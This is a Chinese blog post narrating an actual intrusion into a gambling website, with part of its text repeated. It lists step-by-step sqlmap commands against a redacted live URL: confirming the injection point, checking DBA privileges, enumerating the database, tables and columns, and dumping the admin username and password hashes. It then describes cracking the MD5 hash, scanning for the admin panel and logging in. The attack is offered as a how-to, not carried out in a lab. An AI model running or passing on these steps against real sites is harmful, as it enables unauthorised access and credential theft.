实战入侵某赌博网

  • A+
所属分类:颓废's Blog
摘要

Sqlmap..py -u http://www.xxxx.com/History?id=xxx 从上图可以看到是存在注入点的。

目标操作系统是Windows 2008 R2 or 7,网站脚本是ASP.NET,容器是IIS 7.5

那么我们看看他是否是管理员权限:

Sqlmap.py -u http://www.xxxx.com/History?id=xxx –is-dba

注入脚本找到了一个注入点:

http://www.xxxx.com/History?id=xxx

我们就用Sqlmap来跑:

Sqlmap..py -u http://www.xxxx.com/History?id=xxx

实战入侵某赌博网

从上图可以看到是存在注入点的。

目标操作系统是Windows 2008 R2 or 7,网站脚本是ASP.NET,容器是IIS 7.5

那么我们看看他是否是管理员权限:

Sqlmap.py -u http://www.xxxx.com/History?id=xxx --is-dba
实战入侵某赌博网

[19:11:01] [INFO] resumed: [email protected]

current user is DBA:    True

返回值是True,是一个管理员权限

 

那么我们直接去跑数据库下的表吧:

Sqlmap.py -u http://www.xxxx.com/History?id=xxx --current-db

解释:--current-db是指爆当前所用的数据库
实战入侵某赌博网

我们继续跑数据库下的表:

sqlmap.py -u http://www.xxxx.com/History?id=xxx -D xxx_cc --tables

-D是指数据库 --tables是指表名
实战入侵某赌博网

然后我们找关键字:admin,user,admin_user...等等

继续爆cz_admin表下的列:

sqlmap.py -u http://www.xxxx.com/History?id=xxx -D xxx_cc -T cz_admin --columns

解释:-T是指表名 --columns是指爆表下的列
实战入侵某赌博网

可以看到关键字:admin_pwd和admin_username

我们就可以用:

sqlmap.py -u http://www.xxxx.com/History?id=xxx -D xxx_cc -T cz_admin -C admin_pwd,admin_username --dump

解释:-C是列举admin表下的admin_pwd和admin_username,--dump是指把他们爆出来
实战入侵某赌博网

这样就拿到了管理员的哈希 接着把MD5拿去解密:直接md5解密

解密成功,神器御剑扫后台:

实战入侵某赌博网

之后直接x入后台

实战入侵某赌博网

马赛克不解释

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: